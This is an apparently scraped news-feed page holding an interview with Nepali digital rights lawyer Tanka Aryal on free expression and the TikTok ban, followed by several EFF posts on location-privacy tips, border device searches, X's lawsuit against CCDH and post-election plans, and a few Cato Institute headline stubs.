This interview took place in April 2024 at NetMundial+10 in S\u00e3o Paulo, Brazil and has been edited for length and clarity.\u00a0\nTanka Aryal is the President of Digital Rights Nepal. He is an attorney practicing at the Supreme Court of Nepal. He has long worked to promote digital rights, the right to information, freedom of expression, civic space, accountability, and internet freedom nationally for the last 15 years. Mr. Aryal holds two LLM degrees in International Human Rights Laws from Kathmandu School of Law and Central European University Hungary. Additionally, he completed different degrees from Oxford University UK and Tokiwa University Japan. Mr. Aryal has worked as a consultant and staff with different national international organizations including FHI 360, International Center for Not-for-profit Law (ICNL), UNESCO,\u00a0 World Bank, ARTICLE 19, United Nations Development Programme (UNDP), ISOC, and the United Nations Department of Economic and Social Affairs (UNDESA\/DPADM). Mr. Aryal led a right information campaign throughout the country for more than 4 years as the Executive Director of Citizens\u2019 Campaign for Right to Information.\u00a0\nGreene: Can you introduce yourself? And can you tell me what kind of work your organization does on freedom of speech in particular?\u00a0\nI am Tanka Aryal, I\u2019m from Nepal and I represent Digital Rights Nepal. Looking at my background of work, I have been working on freedom of expression for the last twenty years. Digital Rights Nepal is a new organization that started during COVID when a number of issues came up particularly around freedom of expression online and the use of different social media platforms expressing the ideas of every individual representing different classes, castes, and groups of society. The majority of work done by my organization is particularly advocating for freedom of expression online as well as data privacy and protection. This is the domain we work in mainly, but in the process of talking about and advocating for freedom of expression we also talk about access to information, online information integrity, misinformation, and disinformation.\u00a0\nGreene: What does free speech mean to you personally?\nIt\u2019s a very heavy question! I know it\u2019s not an absolute right\u2014it has limitations. But I feel like if I am not doing any harm to other individuals or it\u2019s not a mass security type of thing, there should not be interference from the government, platforms, or big companies. At the same time, there are a number of direct and indirect undue influences from the political wings or the Party who is running the government, which I don\u2019t like. No interference in my thoughts and expression\u2014that is fundamental for me with freedom of expression.\u00a0\nGreene: Do you consider yourself to be passionate about freedom of expression?\nOh yes. What I\u2019ve realized is, if I consider the human life, existence starts once you start expressing yourself and dealing and communicating with others. So this is the very fundamental freedom for every human being. If this part of rights is taken away then your life, my life, as a human is totally incomplete. That\u2019s why I\u2019m so passionate about this right. Because this right has created a foundation for other rights as well. For example, if I speak out and demand my right to education or the right to food, if my right to speak freely is not protected, then those other rights are also at risk.\nGreene: Do you have a personal experience that shaped how you feel about freedom of expression?\nYes. I don\u2019t mean this in a legal sense, but my personal understanding is that if you are participating in any forum, unless you express your ideas and thoughts, then you are very hardly counted. This is the issue of existence and making yourself exist in society and in community. What I realized was that when you express your ideas with the people and the community, then the response is better and sometimes you get to engage further in the process. If I would like to express myself, if there are no barriers, then I feel comfortable. In a number of cases in my life and journey dealing with the government and media and different political groups, if I see some sort of barriers or external factors that limit me speaking, then that really hampers me. I realize that that really matters.\u00a0\nGreene: In your opinion, what is the state of freedom of expression in Nepal right now?\u00a0\nIt\u2019s really difficult. It\u2019s not one of those absolute types of things. There are some indicators of where we stand. For instance, where we stand on the Corruption Index, where we stand on the Freedom of Expression Index. If I compare the state of freedom of expression in Nepal, it\u2019s definitely better than the surrounding countries like India, Bangladesh, Pakistan, and China. But, learning from these countries, my government is trying to be more restrictive. Some laws and policies have been introduced that limit freedom of expression online. For instance, Tik Tok is banned by the government. We have considerably good conditions, but still there is room to improve in a way that you can have better protections for expression.\u00a0\nGreene: What was the government\u2019s thinking with banning TikTok?\nThere are a number of interpretations. Before banning TikTok the government was seen as pro-China. Once the government banned TikTok\u2014India had already banned it\u2014that decision supported a narrative that the government is leaning to India rather than China. You know, this sort of geopolitical interpretation. A number of other issues were there, too. Platforms were not taking measures even for some issues that shouldn\u2019t have come through the platforms. So the government took the blanket approach in a way to try to promote social harmony and decency and morality. Some of the content published on TikTok was not acceptable, in my opinion, as a consumer myself. But the course of correction could have been different, maybe regulation or other things. But the government took the shortcut way by banning Tik Tok, eliminating the problem.\u00a0\nGreene: So a combination of geopolitics and that they didn\u2019t like what people were watching on TikTok?\u00a0\nActually there are a number of narratives told by the different blocks of people, people with different ideas and the different political wings. It was said that the government\u2014the Maoist leader is the prime minister\u2014considers the very rural people as their vote bank. The government sees them as less literate, brain-washed types of people. \u201cOkay, this is my vote bank, no one can sort of toss it.\u201d Then once TikTok became popular the TikTok users were the very rural people, women, marginalized people. So they started using Tik Tok asking questions to the government and things like that. It was said that the Maoist party was not happy with that. \u201cOkay, now our vote bank is going out of our hands so we better block TikTok and keep them in our control.\u201d So that is the narrative that was also discussed.\u00a0\nGreene: It\u2019s similar in the US, we\u2019re dealing with this right now. Similarly, I think it\u2019s a combination of the geopolitics just with a lot of anti-China sentiment in the US as well as a concern around, \u201cWe don\u2019t like what the kids are doing on TikTok and China is going to use it to serve political propaganda and brainwash US users.\u201d\nIn the case of the US and India, TikTok was banned for national security. But in our case, the government never said, \u201cOkay, TikTok is banned for our national security.\u201d Rather, they were focusing on content that the government wasn\u2019t happy with.\u00a0\nGreene: Right, and let me credit Nepal there for their candor, though I don\u2019t like the decision. Because I personally don\u2019t think the United States government\u2019s national security excuse is very convincing either. But what types of speech or categories of content or topics are really targeted by regulators right now for restriction?\u00a0\nTo be honest, the elected leaders, maybe the President, the Prime Minister, the powerholders don\u2019t like the questions being posed to them. That is a general thing. Maybe the Mayor, maybe the Prime Minister, maybe a Minister, maybe a Chief Minister of one province\u2014the powerholders don\u2019t like being questioned. That is one type of speech made by the people\u2014asking questions, asking for accountability. So that is one set of targets. Similarly, some speech that\u2019s for the protection of the rights of the individual in many cases\u2014like hate speech against Dalit, and women, and the LGBTQIA community\u2014so any sort of speech or comments, any type of content, related to this domain is an issue. People don\u2019t have the capacity to listen to even very minor critical things. If anybody says, \u201cHey, Tanka, you have these things I would like to be changed from your behavior.\u201d People can say these things to me. As a public position holder I should have that ability to listen and respond accordingly. But politicians say, \u201cI don\u2019t want to listen to any sort of criticism or critical thoughts about me.\u201d Particularly the political nature of the speech which seeks accountability and raises transparency issues, that is mostly targeted.\u00a0\nGreene: You said earlier that as long as your speech doesn\u2019t harm someone there shouldn\u2019t be interference. Are there certain harms that are caused by speech that you think are more serious or that really justify regulation or laws restricting them?\nIt\u2019s a very tricky one. Even if regulation is justified, if one official can ban something blanketly, it should go through judicial scrutiny. We tend to not have adequate laws. There are a number of gray areas. Those gray areas have been manipulated and misused by the government. In many cases, misused by, for example, the police. What I understood is that our judiciary is sometimes very sensible and very sensitive about freedom of expression. However, in many cases, if the issue is related to the judiciary itself they are very conservative. Two days back I read in a newspaper that there was a sting operation around one judge engaging [in corruption] with a business. And some of the things came into the media. And the judiciary was so reactive! It was not blamed on the whole judiciary, but the judiciary asked online media to remove that content. There were a number of discussions. Like without further investigation or checking the facts, how can the judiciary give that order to remove that content? Okay, one official thought that this is wrong content, and if the judiciary has the power to take it down, that\u2019s not right and that can be misused any time. I mean, the judiciary is really good if the issues are related to other parties, but if the issue is related to the judiciary itself, the judiciary is conservative.\u00a0\nGreene: You mentioned gray areas and you mentioned some types of hate speech. Is that a gray area in Nepal?\u00a0\nYeah, actually, we don\u2019t have that much confidence in law. What we have is the Electronic Transactions Act. Section 47 says that content online can not be published if the content harms others, and so on. It\u2019s very abstract. So that law can be misused if the government really wanted to drag you into some sort of very difficult position.\u00a0\nWe have been working toward and have provided input on a new law that\u2019s more comprehensive, that would define things in proper ways that have less of a chance of being misused by the police. But it could not move ahead. The bill was drafted in the past parliament. It took lots of time, we provided input, and then after five years it could not move ahead. Then parliament dissolved and the whole thing became null. The government is not that consultative. Unlike how here we are talking [at NetMundial+10] with multi stakeholder participation\u2014the government doesn\u2019t bother. They don\u2019t see incentive for engaging civil society. Rather they consider if we can give them the other troublemakers, let\u2019s keep them away and pass the law. That is the idea they are practicing. We don\u2019t have very clear laws, and because we don\u2019t have clear laws some people really violate fundamental principles. Say someone was attacking my privacy or I was facing defamation issues. The police are very shorthanded, they can\u2019t arrest that person even if they\u2019re doing something really bad. In the meantime, the police, if they have a good political nexus and they just want to drag somebody, they can misuse it.\u00a0\nGreene: How do you feel about private corporations being gatekeepers of speech?\u00a0\nIt\u2019s very difficult. Even during election time the Election Commission issued an Election Order of Conduct, you could see how foolish they are. They were giving the mandate to the ISPs that, \u201cIf there is a violation of this Order of Conduct, you can take it down.\u201d That sort of blanket power given to them can be misused any time. So if you talk about our case, we don\u2019t have that many giant corporations, of course Meta and all the\u00a0 major companies are there. Particularly the government has given certain mandates to ISPs, and in many cases even the National Press Council was asking the ISP Association and the Nepal Telecommunications Authority (NTA) that regulates all ISPs. Without having a very clear mandate to the Press Council, without having a clear mandate to NTA, they are exercising power to instruct the ISPs, \u201cHey, take this down. Hey, don\u2019t publish this.\u201d So that\u2019s the sort of mechanism and the practice out there.\u00a0\nGreene: You said that Digital Rights Nepal was founded during the pandemic. What was the impetus for starting the organization?\u00a0\nWe were totally trapped at home, working from home, studying from home, everything from home. I had worked for a nonprofit organization in the past, advocating for freedom of expression and more, and when we were at home during COVID a number of issues came out about online platforms. Some people were able to exercise their rights because they have access to the internet, but some people didn\u2019t have access to the internet and were unable to exercise freedom of expression. So we recognized there are a number of issues and there is a big digital divide. There are a number of regulatory gray areas in this sector. Looking at the number of kids who were compelled to do online school, their data protection and privacy was another issue. We were engaging in these e-commerce platforms to buy things and there aren\u2019t proper regulations. So we thought there are a number of issues and nobody working on them, so let\u2019s form this initiative. It didn\u2019t come all of the sudden, but our working background was there and that situation really made us realize that we needed to focus our work on these issues.\u00a0\nGreene: Okay, our final question. Who is your free speech hero?\u00a0\nIt depends. In my context, in Nepal, there are a couple of people that don\u2019t hesitate to express their ideas even if it is controversial. There\u2019s also Voltaire\u2019s saying, \u201cI defend your freedom of expression even if I don\u2019t like the content.\u201d He could be one of my free speech heroes. Because sometimes people are hypocrites. They say, \u201cI try to advocate freedom of expression if it applies to you and the government and others, but if any issues come to harm me I don\u2019t believe in the same principle.\u201d Then people don\u2019t defend freedom of expression. I have seen a number of people showing their hypocrisy once the time came where the speech is against them. But for me, like Voltaire says, even if I don\u2019t like your speech I\u2019ll defend it until the end because I believe in the idea of freedom of expression.\u00a0\u00a0<\/p><\/div><\/li>
<\/span><\/a><\/div>Creators of This Police Location Tracking Tool Aren't Vetting Buyers. Here's How To Protect Yourself<\/a><\/span>
by Bill Budington<\/a> on November 9, 2024 at 1:13 am <\/small>
404 Media, along with Haaretz, Notus, and Krebs On Security recently reported on a company that captures smartphone location data from a variety of sources and collates that data into an easy-to-use tool to track devices\u2019 (and, by proxy, individuals\u2019) locations. The dangers that this tool presents are especially grave for those traveling to or from out-of-state reproductive health clinics, places of worship, and the border.\nThe tool, called Locate X, is run by a company called Babel Street. Locate X is designed for law enforcement, but an investigator working with Atlas Privacy, a data removal service, was able to gain access to Locate X by simply asserting that they planned to work with law enforcement in the future.\nWith an incoming administration adversarial to those most at risk from location tracking using tools like Locate X, the time is ripe to bolster our digital defenses. Now more than ever, attorneys general in states hostile to reproductive choice will be emboldened to use every tool at their disposal to incriminate those exerting their bodily autonomy. Locate X is a powerful tool they can use to do this. So here are some timely tips to help protect your location privacy.\nFirst, a short disclaimer: these tips provide some level of protection to mobile device-based tracking. This is not an exhaustive list of techniques, devices, or technologies that can help restore one\u2019s location privacy. Your security plan should reflect how specifically targeted you are for surveillance. Additional steps, such as researching and mitigating the on-board devices included with your car, or sweeping for physical GPS trackers, may be prudent steps which are outside the scope of this post. Likewise, more advanced techniques such as flashing your device with a custom-built privacy- or security-focused operating system may provide additional protections which are not covered here. The intent is to give some basic tips for protecting yourself from mobile device location tracking services.\nDisable Mobile Advertising Identifiers\nServices like Locate X are built atop an online advertising ecosystem that incentivizes collecting troves of information from your device and delivering it to platforms to micro-target you with ads based on your online behavior. One linchpin in the way distinct information (in this case, location) delivered to an app or website at a certain point in time is connected to information delivered to a different app or website at the next point in time is through unique identifiers such as the mobile advertising identifiers (MAIDs). Essentially, MAIDs allow advertising platforms and the data brokers they sell to to \u201cconnect the dots\u201d between an otherwise disconnected scatterplot of points on a map, resulting in a cohesive picture of the movement of a device through space and time.\nAs a result of significant pushback by privacy advocates, both Android and iOS provided ways to disable advertising identifiers from being delivered to third-parties. As we described in a recent post, you can do this on Android following these steps:\nWith the release of Android 12, Google began allowing users to delete their ad ID permanently. On devices that have this feature enabled, you can open the Settings app and navigate to Security & Privacy > Privacy > Ads. Tap \u201cDelete advertising ID,\u201d then tap it again on the next page to confirm. This will prevent any app on your phone from accessing it in the future.\nThe Android opt out should be available to most users on Android 12, but may not be available on older versions. If you don\u2019t see an option to \u201cdelete\u201d your ad ID, you can use the older version of Android\u2019s privacy controls to reset it and ask apps not to track you.\n\nAnd on iOS:\nApple requires apps to ask permission before they can access your IDFA. When you install a new app, it may ask you for permission to track you.\nSelect \u201cAsk App Not to Track\u201d to deny it IDFA access.\nTo see which apps you have previously granted access to, go to Settings > Privacy & Security > Tracking.\nIn this menu, you can disable tracking for individual apps that have previously received permission. Only apps that have permission to track you will be able to access your IDFA.\nYou can set the \u201cAllow apps to Request to Track\u201d switch to the \u201coff\u201d position (the slider is to the left and the background is gray). This will prevent apps from asking to track in the future. If you have granted apps permission to track you in the past, this will prompt you to ask those apps to stop tracking as well. You also have the option to grant or revoke tracking access on a per-app basis.\nApple has its own targeted advertising system, separate from the third-party tracking it enables with IDFA. To disable it, navigate to Settings > Privacy > Apple Advertising and set the \u201cPersonalized Ads\u201d switch to the \u201coff\u201d position to disable Apple\u2019s ad targeting.\n\nAudit Your Apps\u2019 Trackers and Permissions\nIn general, the more apps you have, the more intractable your digital footprint becomes. A separate app you\u2019ve downloaded for flashlight functionality may also come pre-packaged with trackers delivering your sensitive details to third-parties. That\u2019s why it\u2019s advisable to limit the amount of apps you download and instead use your pre-existing apps or operating system to, say, find the bathroom light switch at night. It isn't just good for your privacy: any new app you download also increases your \u201cattack surface,\u201d or the possible paths hackers might have to compromise your device.\nWe get it though. Some apps you just can\u2019t live without. For these, you can at least audit what trackers the app communicates with and what permissions it asks for. Both Android and iOS have a page in their Settings apps where you can review permissions you've granted apps. Not all of these are only \u201con\u201d or \u201coff.\u201d Some, like photos, location, and contacts, offer more nuanced permissions. It\u2019s worth going through each of these to make sure you still want that app to have that permission. If not, revoke or dial back the permission. To get to these pages:\nOn Android: Open Settings > Privacy & Security > Privacy Controls > Permission Manager.\u00a0\nOn iPhone: Open Settings > Privacy & Security.\nIf you're inclined to do so, there are tricks for further research. For example, you can look up tracks in Android apps using an excellent service called Exodus Privacy. As of iOS 15, you can check on the device itself by turning on the system-level app privacy report in Settings > Privacy > App Privacy Report. From that point on, browsing to that menu will allow you to see exactly what permissions an app uses, how often it uses them, and what domains it communicates with. You can investigate any given domain by just pasting it into a search engine and seeing what\u2019s been reported on it. Pro tip: to exclude results from that domain itself and only include what other domains say about it, many search engines like Google allow you to use the syntax \n-site:www.example.com.\n\nDisable Real-Time Tracking with Airplane Mode\nTo prevent an app from having network connectivity and sending out your location in real-time, you can put your phone into airplane mode. Although it won\u2019t prevent an app from storing your location and delivering it to a tracker sometime later, most apps (even those filled with trackers) won\u2019t bother with this extra complication. It is important to keep in mind that this will also prevent you from reaching out to friends and using most apps and services that you depend on. Because of these trade-offs, you likely will not want to keep Airplane Mode enabled all the time, but it may be useful when you are traveling to a particularly sensitive location.\nSome apps are designed to allow you to navigate even in airplane mode. Tapping your profile picture in Google Maps will drop down a menu with Offline maps. Tapping this will allow you to draw a boundary box and pre-download an entire region, which you can do even without connectivity. As of iOS 18, you can do this on Apple Maps too: tap your profile picture, then \u201cOffline Maps,\u201d and \u201cDownload New Map.\u201d\nOther apps, such as Organic Maps, allow you to download large maps in advance. Since GPS itself determines your location passively (no transmissions need be sent, only received), connectivity is not needed for your device to determine its location and keep it updated on a map stored locally.\nKeep in mind that you don\u2019t need to be in airplane mode the entire time you\u2019re navigating to a sensitive site. One strategy is to navigate to some place near your sensitive endpoint, then switch airplane mode on, and use offline maps for the last leg of the journey.\nSeparate Devices for Separate Purposes\nFinally, you may want to bring a separate, clean device with you when you\u2019re traveling to a sensitive location. We know this isn\u2019t an option available to everyone. Not everyone can afford purchasing a separate device just for those times they may have heightened privacy concerns. If possible, though, this can provide some level of protection.\nA separate device doesn\u2019t necessarily mean a separate data plan: navigating offline as described in the previous step may bring you to a place you know Wi-Fi is available. It also means any persistent identifiers (such as the MAID described above) are different for this device, along with different device characteristics which won\u2019t be tied to your normal personal smartphone. Going through this phone and keeping its apps, permissions, and browsing to an absolute minimum will avoid an instance where that random sketchy game you have on your normal device to kill time sends your location to its servers every 10 seconds.\nOne good (though more onerous) practice that would remove any persistent identifiers like long-lasting cookies or MAIDs is resetting your purpose-specific smartphone to factory settings after each visit to a sensitive location. Just remember to re-download your offline maps and increase your privacy settings afterwards.\nFurther Reading\nOur own Surveillance Self-Defense site, as well as many other resources, are available to provide more guidance in protecting your digital privacy. Often, general privacy tips are applicable in protecting your location data from being divulged, as well.\nThe underlying situation that makes invasive tools like Locate X possible is the online advertising industry, which incentivises a massive siphoning of user data to micro-target audiences. Earlier this year, the FTC showed some appetite to pursue enforcement action against companies brokering the mobile location data of users. We applauded this enforcement, and hope it will continue into the next administration. But regulatory authorities only have the statutory mandate and ability to punish the worst examples of abuse of consumer data. A piecemeal solution is limited in its ability to protect citizens from the vast array of data brokers and advertising services profiting off of surveilling us all.\nOnly a federal privacy law with a strong private right of action which allows ordinary people to sue companies that broker their sensitive data, and which does not preempt states from enacting even stronger privacy protections for their own citizens, will have enough teeth to start to rein in the data broker industry. In the meantime, consumers are left to their own devices (pun not intended) in order to protect their most sensitive data, such as location. It\u2019s up to us to protect ourselves, so let\u2019s make it happen!<\/p><\/div><\/li>
<\/span><\/a><\/div>Celebrating the Life of Aaron Swartz: Aaron Swartz Day 2024<\/a><\/span>
by Hayley Tsukayama<\/a> on November 9, 2024 at 12:03 am <\/small>
Aaron Swartz was a digital rights champion who believed deeply in keeping the internet open. His life was cut short in 2013, after federal prosecutors charged him under the Computer Fraud and Abuse Act (CFAA) for systematically downloading academic journal articles from the online database JSTOR. Facing the prospect of a long and unjust sentence, Aaron died by suicide at the age of 26. EFF was proud to call Aaron a friend and ally.\nToday, November 8, would have been his 38th birthday.\u00a0 On November 9, the organizers of Aaron Swartz Day are celebrating his life with a guest-packed podcast featuring those carrying on the work around issues close to his heart. Hosts Lisa Rein and Andre Vinicus Leal Sobral will speak to:\u00a0\n\nRyan Shapiro, co-founder of the national security\u00a0 transparency non-profit Property of the People\nNathan Dyer of SecureDrop, Newsroom Support Engineer for the Freedom of the Press Foundation.\nTracey Jaquith, Founding Coder and TV Architect at the Internet Archive\nTracy Rosenberg, co-founder of the Aaron Swartz Day Police Surveillance Project and Oakland Privacy\nBrewster Kahle founder of the Internet Archive\nRyan Sternlicht, VR developer, educator, researcher, advisor, and maker\nGrant Smith Ellis, Chairperson of the Board, MassCann and Legal Intern at the Parabola Center\nMichael \u201cMek\u201d Karpeles, Open Library, Internet Archive\n\nThe podcast will start at 2 p.m. PT\/10 p.m. UTC. Please read the official page of the Aaron Swartz Day and International Hackathon for full details.\nIf you're a programmer or developer engaged in cutting-edge exploration of technology, please check out EFF's Coders' Rights Project.<\/p><\/div><\/li>
<\/span><\/a><\/div>EFF to Second Circuit: Electronic Device Searches at the Border Require a Warrant<\/a><\/span>
by Sophia Cope<\/a> on November 8, 2024 at 11:01 pm <\/small>
EFF, along with ACLU and the New York Civil Liberties Union, filed an amicus brief in the U.S. Court of Appeals for the Second Circuit urging the court to require a warrant for border searches of electronic devices, an argument EFF has been making in the courts and Congress for nearly a decade.\nThe case, U.S. v. Kamaldoss, involves the criminal prosecution of a man whose cell phone and laptop were forensically searched after he landed at JFK airport in New York City. While a manual search involves a border officer tapping or mousing around a device, a forensic search involves connecting another device to the traveler\u2019s device and using software to extract and analyze the data to create a detailed report the device owner\u2019s activities and communications. In part based on evidence obtained during the forensic device searches, Mr. Kamaldoss was subsequently charged with prescription drug trafficking.\nThe district court upheld the forensic searches of his devices because the government had reasonable suspicion that the defendant \u201cwas engaged in efforts to illegally import scheduled drugs from abroad, an offense directly tied to at least one of the historic rationales for the border exception\u2014the disruption of efforts to import contraband.\u201d\nThe number of warrantless device searches at the border and the significant invasion of privacy they represent is only increasing. In Fiscal Year 2023, U.S. Customs and Border Protection (CBP) conducted 41,767 device searches.\nThe Supreme Court has recognized for a century a border search exception to the Fourth Amendment\u2019s warrant requirement, allowing not only warrantless but also often suspicionless \u201croutine\u201d searches of luggage, vehicles, and other items crossing the border.\nThe primary justification for the border search exception has been to find\u2014in the items being searched\u2014goods smuggled to avoid paying duties (i.e., taxes) and contraband such as drugs, weapons, and other prohibited items, thereby blocking their entry into the country.\nIn our brief, we argue that the U.S. Supreme Court\u2019s balancing test in Riley v. California (2014) should govern the analysis here. In that case, the Court weighed the government\u2019s interests in warrantless and suspicionless access to cell phone data following an arrest against an arrestee\u2019s privacy interests in the depth and breadth of personal information stored on a cell phone. The Supreme Court concluded that the search-incident-to-arrest warrant exception does not apply, and that police need to get a warrant to search an arrestee\u2019s phone.\nTravelers\u2019 privacy interests in their cell phones and laptops are, of course, the same as those considered in Riley. Modern devices, a decade later, contain even more data points that together reveal the most personal aspects of our lives, including political affiliations, religious beliefs and practices, sexual and romantic affinities, financial status, health conditions, and family and professional associations.\nIn considering the government\u2019s interests in warrantless access to digital data at the border, Riley requires analyzing how closely such searches hew to the original purpose of the warrant exception\u2014preventing the entry of prohibited goods themselves via the items being searched. We argue that the government\u2019s interests are weak in seeking unfettered access to travelers\u2019 electronic devices.\nFirst, physical contraband (like drugs) can\u2019t be found in digital data. Second, digital contraband (such as child pornography) can\u2019t be prevented from entering the country through a warrantless search of a device at the border because it\u2019s likely, given the nature of cloud technology and how internet-connected devices work, that identical copies of the files are already in the country on servers accessible via the internet.\nFinally, searching devices for evidence of contraband smuggling (for example, text messages revealing the logistics of an illegal import scheme) and other evidence for general law enforcement (i.e., investigating non-border-related domestic crimes) are too \u201cuntethered\u201d from the original purpose of the border search exception, which is to find prohibited items themselves and not evidence to support a criminal prosecution.\nIf the Second Circuit is not inclined to require a warrant for electronic device searches at the border, we also argue that such a search\u2014whether manual or forensic\u2014should be justified only by reasonable suspicion that the device contains digital contraband and be limited in scope to looking for digital contraband. This extends the Ninth Circuit\u2019s rule from U.S. v. Cano (2019) in which the court held that only forensic device searches at the border require reasonable suspicion that the device contains digital contraband, while manual searches may be conducted without suspicion. But the Cano court also held that all searches must be limited in scope to looking for digital contraband (for example, call logs are off limits because they can\u2019t contain digital contraband in the form of photos or files).\nIn our brief, we also highlighted three other district courts within the Second Circuit that required a warrant for border device searches: U.S. v. Smith (2023), which we wrote about last year; U.S. v. Sultanov (2024), and U.S. v. Fox (2024). We plan to file briefs in their appeals, as well, in the hope that the Second Circuit will rise to the occasion and be the first circuit to fully protect travelers\u2019 Fourth Amendment rights at the border.<\/p><\/div><\/li>
<\/span><\/a><\/div>EFF to Court: Reject X\u2019s Effort to Revive a Speech-Chilling Lawsuit Against a Nonprofit<\/a><\/span>
by Aaron Mackey<\/a> on November 7, 2024 at 11:48 pm <\/small>
This post was co-written by EFF legal intern Gowri Nayar.\nX\u2019s lawsuit against the nonprofit Center for Countering Digital Hate is intended to stifle criticism and punish the organization for its reports criticizing the platform\u2019s content moderation practices, and a previous ruling dismissing the lawsuit should be affirmed, EFF and multiple organizations argued in a brief filed this fall.\u00a0\nX sued the Center for Countering Digital Hate (\u201cCCDH\u201d) in federal court in 2023 in response to its reports, which concluded that X\u2019s practices have facilitated an environment of hate speech and misinformation online. Although X\u2019s suit alleges, among other things, breach of contract and violation of the Computer Fraud and Abuse Act, the case is really about X trying to hold CCDH liable for the public controversy surrounding its moderation practices. At bottom, X is claiming that CCDH damaged the platform by critically reporting on it.\nCCDH sought to throw out the case on the merits and under California\u2019s anti-SLAPP statute. The California law allows lawsuits to be dismissed if they are filed in retaliation for someone exercising their free speech rights, known as Strategic Lawsuits Against Public Participation, or SLAPPs. In March, the district court ruled in favor of CCDH, dismissed the case, and found that the lawsuit was a SLAPP.\nAs the district judge noted, X\u2019s suit \u201cis about punishing the Defendants for their speech.\u201d It was correct to reject X\u2019s contract and CFAA theories and saw them for what they were: grievances with CCDH\u2019s criticisms masquerading as legal claims.\nX appealed the ruling to the U.S. Court of Appeals for the Ninth Circuit earlier this year. In September, EFF, along with the ACLU, ACLU of Northern California, and the Knight First Amendment Institute at Columbia University, filed an amicus brief in support of CCDH.\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\nThe amicus brief argues that the Ninth Circuit should not allow X to make use of state contract law and a federal anti-hacking statute to stifle CCDH\u2019s speech. Through this lawsuit, X wants to punish CCDH for publishing reports that highlighted how X\u2019s policies and practices are allowing misinformation and hate speech to thrive on its platform. We also argue against the enforcement of X\u2019s anti-scraping provisions because of how vital scraping is to modern journalism and research.\nLastly, we called on the court to dismiss X\u2019s interpretation of the CFAA because it relied on a legal theory that has already been rejected by courts\u2014including the Ninth Circuit itself\u2014in earlier cases. Allowing the CFAA to be used to criminalize all instances of unauthorized access would run counter to prior decisions and would render illegal large categories of activities such as sharing passwords with friends and family.\nRuling in favor of X in this lawsuit would set a very dangerous precedent for free speech rights and allow powerful platforms to exert undue control over information online. We hope the Ninth Circuit affirms the lower court decision and dismisses this meritless lawsuit.<\/p><\/div><\/li>
<\/span><\/a><\/div>The 2024 U.S. Election is Over. EFF is Ready for What's Next.<\/a><\/span>
by Cindy Cohn<\/a> on November 6, 2024 at 4:56 pm <\/small>
The dust of the U.S. election is settling, and we want you to know that EFF is ready for whatever\u2019s next. Our mission to ensure that technology serves you\u2014rather than silencing, tracking, or oppressing you\u2014does not change. Some of what\u2019s to come will be in uncharted territory. But we have been preparing for whatever this future brings for a long time. EFF is at its best when the stakes are high.\u00a0\nNo matter what, EFF will take every opportunity to stand with users. We\u2019ll continue to advance our mission of user privacy, free expression, and innovation, regardless of the obstacles. We will hit the ground running.\u00a0\nDuring the previous Trump administration, EFF didn\u2019t just hold the line. We pushed digital rights forward in significant ways, both nationally and locally.\u00a0 We supported those protesting in the streets, with expanded Surveillance Self-Defense guides and our Security Education Companion. The first offers information for how to protect yourself while you exercise your First Amendment rights, and the second gives tips on how to help your friends and colleagues be more safe.\nAlong with our allies, we fought government use of face surveillance, passing municipal bans on the dangerous technology. We urged the Supreme Court to expand protections for your cell phone data, and in Carpenter v United States, they did so\u2014recognizing that location information collected by cell providers creates a \u201cdetailed chronicle of a person\u2019s physical presence compiled every day, every moment over years.\u201d Now, police must get a warrant before obtaining a significant amount of this data.\u00a0\nEFF is at its best when the stakes are high.\u00a0\nBut we also stood our ground when governments and companies tried to take away the hard-fought protections we\u2019d won in previous years. We stopped government attempts to backdoor private messaging with \u201cghost\u201d and \u201cclient-side scanning\u201d measures that obscured their intentions to undermine end-to-end encryption. We defended Section 230, the common sense law that protects Americans\u2019 freedom of expression online by protecting the intermediaries we all rely on. And when the COVID pandemic hit, we carefully analyzed and pushed back measures that would have gone beyond what was necessary to keep people safe and healthy by invading our privacy and inhibiting our free speech.\u00a0\nEvery time policymakers or private companies tried to undermine your rights online during the last Trump administration from 2016-2020, we were there\u2014just as we continued to be under President Biden. In preparation for the next four years, here\u2019s just some of the groundwork we\u2019ve already laid:\u00a0\n\nBorder Surveillance: For a decade we\u2019ve been revealing how the hundreds of millions of dollars pumped into surveillance technology along the border impacts the privacy of those who live, work, or seek refuge there, and thousands of others transiting through our border communities each day. We\u2019ve defended the rights of people whose devices have been searched or seized upon entering the country. We\u2019ve mapped out the network of automated license plate readers installed at checkpoints and land entry points, and the more than 465 surveillance towers along the U.S.-Mexico border. And we\u2019ve advocated for sanctuary data policies restricting how ICE can access criminal justice and surveillance data.\u00a0\u00a0\nSurveillance Self-Defense: Protecting your private communications will only become more critical, so we\u2019ve been expanding both the content and the translations of our Surveillance Self-Defense guides. We\u2019ve written clear guidance for staying secure that applies to everyone, but is particularly important for journalists, protesters, activists, LGBTQ+ youths, and other vulnerable populations.\nReproductive Rights: Long before Roe v. Wade was overturned, EFF was working to minimize the ways that law enforcement can obtain data from tech companies and data brokers. After the Dobbs decision was handed down, we supported multiple laws in California that shield both reproductive and transgender health data privacy, even for people outside of California. But there\u2019s more to do, and we\u2019re working closely with those involved in the reproductive justice movement to make more progress.\u00a0\nTransition Memo: When the next administration takes over, we\u2019ll be sending a lengthy, detailed policy analysis to the incoming administration on everything from competition to AI to intellectual property to surveillance and privacy. We provided a similarly thoughtful set of recommendations on digital rights issues after the last presidential election, helping to guide critical policy discussions.\u00a0\n\nWe\u2019ve prepared much more too. The road ahead will not be easy, and some of it is not yet mapped out, but one of the reasons EFF is so effective is that we play the long game. We\u2019ll be here when this administration ends and the next one takes over, and we\u2019ll continue to push. Our nonpartisan approach to tech policy works because we work for the user.\u00a0\nWe\u2019re not merely fighting against individual companies or elected officials or even specific administrations.\u00a0 We are fighting for you. That won\u2019t stop no matter who\u2019s in office.\u00a0\nDONATE TODAY<\/p><\/div><\/li>
<\/span><\/a><\/div>Infrastructure Investment: A State, Local, and Private Responsibility<\/a><\/span>
by Cato Institute<\/a> on June 18, 2022 at 10:37 am <\/small>
Infrastructure Investment: A State, Local, and Private Responsibility<\/p><\/div><\/li>
<\/span><\/a><\/div>The Next \u201cCrisis\u201d: The Debt Ceiling<\/a><\/span>
by Cato Institute<\/a> on June 18, 2022 at 3:05 am <\/small>
The Next \"Crisis\": The Debt Ceiling<\/p><\/div><\/li>
<\/span><\/a><\/div>The Next \u201cCrisis\u201d: The Debt Ceiling<\/a><\/span>
by Cato Institute<\/a> on June 18, 2022 at 3:05 am <\/small>
The Next \"Crisis\": The Debt Ceiling<\/p><\/div><\/li>
<\/span><\/a><\/div>What the Second Amendment Permits<\/a><\/span>
by Cato Institute<\/a> on June 18, 2022 at 3:05 am <\/small>
